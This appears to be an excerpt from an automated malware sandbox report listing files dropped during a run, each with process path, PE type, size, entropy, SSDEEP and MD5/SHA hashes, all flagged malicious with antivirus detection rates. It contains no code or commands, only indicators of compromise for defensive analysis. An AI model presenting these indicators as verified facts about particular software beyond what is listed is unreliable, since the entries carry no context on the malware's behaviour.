                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BFE88E18D1E803ED3299B79F4018C8F3F8633264B0D431F9B60E4A5D392D975AABAC3973F3F942CF9AA43082987DF1A31036B25489F3D9DE740608E5E45AC5A1
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2953728
Entropy (8bit):7.094621877297601
Encrypted:false
SSDEEP:49152:oGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLhDmg27RnWGj:44OEtwiICvYMRfBD527BWG
MD5:BA84FF341112A3F7FE937B07B7FBFD16
SHA1:F667051D9D1061CE83EEF5761E2848FC73EAC76A
SHA-256:98A8B467CBB7E8876B8CF480E819B949B241E5A5997053A7C07F0102A2B85616
SHA-512:019158318CD101CD845B4A0B177558F9B8F3FE97524E0E9AA4363AE1676E985D4FFE5FE2768E7013B1ACA5A59CE82A91111D69DF521553875F7E933C78167733
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1485824
Entropy (8bit):5.496414553076617
Encrypted:false
SSDEEP:24576:sAMuR+3kMbVjhWsqjnhMgeiCl7G0nehbGZpbD:1D+lbVjhaDmg27RnWGj
MD5:1735D58F765270EADB00C02CBF590238
SHA1:AA495DB0BB4E4EFD8D8EF022B495A4671EBB4113
SHA-256:DAABBEE559038C08D775AE48126D2CBB715FDC1F35667C34D880D4A94E7D5BF2
SHA-512:D067F757DA5425562A2692153A548DE4D8E14D0E0DB7C1C00BCC3C478453D1A2107E820FB72D404684A4129A2522041E5EB294CA7B14788C5F3FCC4B9BF6BEC0
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1290240
Entropy (8bit):5.277770136745501
Encrypted:false
SSDEEP:12288:mImGUcsvZZdubv7hfl3bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlrsqjnhMgeiCl7G0nehbGZpbD
MD5:3FD1AD658B714CCA2F0FD2124FF85001
SHA1:EEA5867B7CB807C661765531A7937C84EC6CC770
SHA-256:555756188BE428E1B1C27C9F4C7E0B56704B5B30F83962176568A01A9A455C3D
SHA-512:FC1EFC665EA8345637B1F3F8ED5253796D608EEEE042D819A0FAE0F490067F1A882F027EBB84C81C5982B73CCEA0DD6ACC5B61178E8D256645BAB2CCAFFA4CED
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1644544
Entropy (8bit):5.694818209825649
Encrypted:false
SSDEEP:24576:X0vHyeLj8trn3wsIsqjnhMgeiCl7G0nehbGZpbD:ytj4rgs0Dmg27RnWGj
MD5:EDEE587828281B128C70B47415D4B660
SHA1:C6D1D0ABBD01F62EC0A987D80E4626A2738E1AC0
SHA-256:60C95B6AB27FB4B3287F57EA811A5DE08DCC6585366D705566E88F400D0B9E4E
SHA-512:7E74F7F57523BD7028DF469F832356BA249BE08459E560FAC873E718C824DD6EB8BE639A1F4391B5ABC68930CDA38B2A27057F1D8E8167D633597276B494F856
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.279684665870317
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:7oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZtsqjnhMgeiCl7G0nehbGZpv:y4i0wGJra0uAUfkVy7/ZRDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E412A15E4E6C07D0AC492B4D30DB0292
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FB0754CEF81AD6E3EA7E119189FAFAB72927B0B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:092852E29F8713CDEEC7AE3550FE54E3E5A74935231B9306CEA2F36A4AEE2A8E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FFF8EFF1A16FCA54F50918EA403359A19926114AC9DFA1F99D360A61D85F0E73B1B23B0A48A7C196916BF42C83E2E0FC9CE84B66EB4B232001CDFAA106B3D168
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.448776007106288
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:oeR0gB6axoCf0R6RLQRF/TzJqe58BimesqjnhMgeiCl7G0nehbGZpbD:0gHxmR6uBTzge5MimyDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F6C99B4593023E510305EDC7BED1CB23
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4710300516C6638F519B9A03361BE1E76516E699
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3B3FF6FA30908D2CE879D3DA1D9A5B106A465BF63628EAD9FBABE14640F638C6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:33D3861715C9A9E2484E91CC8FF3EDC134037AC0EBE56A9A5BC29236F6F88FAEAEBFB6DA2019D6F53E0EC4F83800ED639B01085B3B328A706CC257B4155DCE18
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4460725445166105
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:snEbH0j4x7R6SvyCM4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:skwOtO74sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:86835FD2FBCBE3EE930EE93610BCC936
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6B04A439EE3EFDDADAE1DF73BB6BDABE2974B4CF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD3E332220C4D55D740E77C74D487497AA92259241958A203CC952EC97EBDDCA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0E8A0692555C1DB02F081BB5564F57CD88C890C49C34E8DAADF86CD5718219CA5CB80DF9AF74148724DB71E50C2BCFA45243F3524A48251D28E1F537880B37A7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446826238256623
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:hU/VTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9C255D0DE3E9DD4F1532F084841B07AB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:88D319659321F63BEB51128BC71290E14637F180
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:505AF85FD6C22320D670B53F243B87A59E6663E3067FB924134A6111D8631523
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:962BA83E87A3245417A9D847EA584370391083237BD7DF11D0CF17914C76E76368A46BEBDA7F620320FD83E884F7D3AD0BA34DB379403DD4F42BFB62ABCC44BA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483752551698598
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:6x71iBLZ05jNTmJWExUsqjnhMgeiCl7G0nehbGZpbD:6xhiHIjNgwDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F2620795CE1351171CB45EA42876E333
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C8052778F85499EFEA9A20BFC08A4E483D769D28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A8951A66EBC78361DE9B0FAE26B577507696435630F75272A131B8315475568A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7DAE049D01082948EBA85984BCBBA890C569818775BD5E8625C01A9E62A0C8C5F1080BDD8864A887FE2D1A35B8AE26A38537364AFC20BF37FF8F8489F5504829
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4667218812397556
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:llnRklQ6fgJcEwixWsqjnhMgeiCl7G0nehbGZpbD:JoRfgJcEwCaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4343FC768C07BBBBAE9A86A3E3A46633
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:48D1F0C2B915E5CDE20C44B535999B8060671E28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:59D78B61A02A91D078CD7B57125B248C03BD6336E4B6B323ACED4330A2CDB3F8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3F97DF76B1C0C5AB417DF7971AB4E4776E2614B12A328E6B5ABD70E961F065F1426D919796049A35446505D4D43B7D35351D727934F9BA65652F52B28AF123D7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496533219178187
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:dW25k8hb0Haw+xmsqjnhMgeiCl7G0nehbGZpbD:dWyk8SHawmqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0F5E5D6F2894010F188BAB3F63847815
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3F91CB365C52F5272C2DFCB8E8D37C7F0A096A9C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3A69F275C20F5C353BB6B7CCA083969CCFECDD807BDC55835D6CE6A5754C6158
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AA1D0A04663A464B6F6A22AAAF7DB5D9A64C6B328BBCB758F6CC524CD6233BB1965F3DF66E915E65FE4A176191135B77350858EB7ECB6CA7910EAA7FE59D6FD5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163956777480587
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:fWP/aK2vB+RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:fKCKABOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F3B4E8795321343A72B8157DA6106AC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D31742CFC4E59ACC9237054A3AA7C504C1CD688B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E92AC2B917013D3D639828AB29EEDDBBB7BD704C5DDA5595BEE6E4B7CEC72B6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:48CAC5516256EC2D1A63C6BF595114178E5C7A3151C1F26E443842AB289842A7355C3477ECC3BB2E77FDDF4EE84EB8DC6E3A8410622AE854EDDF304489F5D665
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.162036162550022
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:XO7cCNWB+09fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:ejNWBPBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:45CC11E0B031AED095A54F6972382E5D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DD87DDECEAEE4757DDC747C4891158C00F930273
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B9B725127EB1A49278FAC8FAA506848AF62778A5C87638B49361875C4A951F49
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE2188CCFF6BEE20C71EE8DBD1E926D1CEC188045C11BDDE202670B58B76C34D85087DB33FAD1E914E9666F23A4A746A53B0F71840B9CB509E84F1957A03EE0A
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238928353186369
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:1ihRyhdsRrDsqjnhMgeiCl7G0nehbGZpbD:1ihsoRHDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C6789B35A529474081B22F499E9DEFE7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:227BD03B978F89B9DEC09AE688DE4A0942F96A2D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:67C7F6E0BB8C66BB4879223A61A99ADE8D1B8CD8D32B3CD9427417792D2A648C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00360C29787A3076A423B7534F76C155B158F5A4CDA9F206DF100C31E14DB411B686FF78AA22C954F895B3AF817CAEBA636D92262E15A9CA125EA0972E02E43A
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.351008199686425
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:j1FDmRF+wpx/QafQsqjnhMgeiCl7G0nehbGZpbD:vmRF+wn/JfMDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6F7B7CFBB5E391D4CAD2F197004DA7AD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3E8D80A5C32720EAF0A9A381D64EB9E1DFFFE9C1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D2FA43FBDDB115986FEB0B7DC7EEF4ED8C4BBDB09DF880DF556FDC0D9D521B41
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:18FBBAE4B173EB4797522BB41D8E9FC8AC5FC7F53FFF2FB7282DD5575B041DBD463797701827AB514774D5DC7A70D0100DA8288024912E86462197EB935AAE80
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.161996379298664
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:w2Ae621B+0YNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:dE21BPCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6295C31F028705750935C43AB327C16E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:134FE31ADDDBC0F3AF79AC29B63C79DAE8584F05
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:348DED167A28F390B62506780D5915D32834FF1F1B144E94551B65144177E38D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6032ECF4088475AFCCFA1164646174AF94C5EFE543CD4C5CBFFB8EF1DCAD8A55232261E5BC67CD2FFD6B875EDF60F3FD958D5654F91AEA08EDADE1E030530A90
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.987636737874314
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:KZkVX3lfrFfR0BecCqKBs+4o8YhAhDmg27RnWGj:KqR1frZRpcTKX4TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C5FB93B88830D3B0FA1AF8B469FDDF03
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6AADCD5F8D5AB4C75189DEFE777B77B3AA12507F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DD09E08CBBEE2F8331815ADA585427775AAA13C29C86A8FF454338754F0196D7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4EC23FB2696BE51A5F0797F1CCED6A56FDB95471C6E2C80D2A19D893CB6F88CF7BD8631AAC88CF66A5EBEA8BA6E5A47C09AB5E87740EDE4CFD82F2A6639C463C
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2151936
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.987636641881946
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:eZkVX3lfrFfR0BecCqKBs+4o8YhAhDmg27RnWGj:eqR1frZRpcTKX4TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:222E5CFBDA0DA1E8CB2700CE5870BB2F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:825714A9680CC68CFDB14185FB7E726C6FBCB7D1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B22567BD4EDF17C9EF2B2E4197922870F4482E4F684E682AE28044ABF399E26F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A694E154C91886A933541B50E652F749ABDBC2697F2F19D00096FE3C94234CD464511542EA9455439CF5675CE5A29B231D642D225D21D8EDDE28F4C05B026573
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.068097121090447
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:5OXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5OsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:713E954B8604235473F207D5CD22E5A6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4C6A4A9D084467690EE7B8FE8590C492D630F62A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D68A9031B3440A499BA087A6D01A91F9922D67F6215F2773089EE7E0D6AE65B8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:966723674D07AD7EA274DA6C46451D29604E08482A735B2BFE549A786DF09D59D05FEA3C7632BBF2EFEB1772C098973F18E217A265364B0EB3A1DC2D6723B3BB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
